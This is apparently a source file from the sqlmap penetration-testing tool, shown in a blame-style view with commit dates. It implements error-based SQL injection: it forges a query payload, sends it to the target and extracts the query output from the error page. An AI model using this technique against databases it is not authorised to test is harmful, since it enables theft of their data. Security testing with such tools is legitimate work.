2010-10-20 13:09:04 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
import time
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
|
|
|
from lib.core.common import getUnicode
|
|
|
|
from lib.core.common import randomInt
|
|
|
|
from lib.core.common import replaceNewlineTabs
|
|
|
|
from lib.core.common import safeStringFormat
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-10-20 13:09:04 +04:00
|
|
|
from lib.core.session import setError
|
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
from lib.utils.resume import resume
|
|
|
|
|
|
|
|
from lib.core.settings import ERROR_SPACE
|
|
|
|
from lib.core.settings import ERROR_EMPTY_CHAR
|
2010-10-20 13:35:46 +04:00
|
|
|
from lib.core.settings import ERROR_START_CHAR
|
|
|
|
from lib.core.settings import ERROR_END_CHAR
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2010-10-31 19:58:38 +03:00
|
|
|
def errorUse(expression, returnPayload=False):
|
2010-10-20 13:09:04 +04:00
|
|
|
"""
|
|
|
|
Retrieve the output of a SQL query taking advantage of an error SQL
|
|
|
|
injection vulnerability on the affected parameter.
|
|
|
|
"""
|
2010-10-25 18:11:47 +04:00
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
output = None
|
2010-10-20 13:09:04 +04:00
|
|
|
logic = conf.logic
|
|
|
|
randInt = randomInt(1)
|
2010-10-25 18:11:47 +04:00
|
|
|
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
2010-10-20 13:09:04 +04:00
|
|
|
query = agent.postfixQuery(query)
|
2010-10-20 13:46:57 +04:00
|
|
|
startLimiter = ""
|
|
|
|
endLimiter = ""
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2010-10-20 13:54:17 +04:00
|
|
|
expressionUnescaped = expression
|
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
if kb.dbmsDetected:
|
|
|
|
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
|
|
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
2010-10-21 02:43:02 +04:00
|
|
|
|
2010-11-02 14:59:24 +03:00
|
|
|
if kb.dbms == DBMS.MYSQL:
|
2010-10-26 19:42:54 +04:00
|
|
|
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
2010-10-21 02:43:02 +04:00
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
|
|
|
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
2010-10-20 13:46:57 +04:00
|
|
|
startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
|
|
|
|
endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
|
2010-10-20 13:09:04 +04:00
|
|
|
else:
|
2010-10-20 13:54:17 +04:00
|
|
|
expressionUnescaped = kb.misc.handler.unescape(expression)
|
|
|
|
startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
|
|
|
|
endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2010-10-25 18:11:47 +04:00
|
|
|
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
|
|
|
|
2010-11-08 01:34:29 +03:00
|
|
|
debugMsg = "query: %s" % forgedQuery
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2010-10-25 18:11:47 +04:00
|
|
|
payload = agent.payload(newValue=forgedQuery)
|
2010-10-29 20:11:50 +04:00
|
|
|
result = Request.queryPage(payload, content=True)
|
2010-10-20 14:29:18 +04:00
|
|
|
match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
|
2010-10-26 13:33:18 +04:00
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
if match:
|
|
|
|
output = match.group('result')
|
2010-11-08 19:46:25 +03:00
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
if output:
|
|
|
|
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
|
|
|
|
|
|
|
|
if conf.verbose > 0:
|
|
|
|
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-31 19:58:38 +03:00
|
|
|
if returnPayload:
|
|
|
|
return output, payload
|
|
|
|
else:
|
|
|
|
return output
|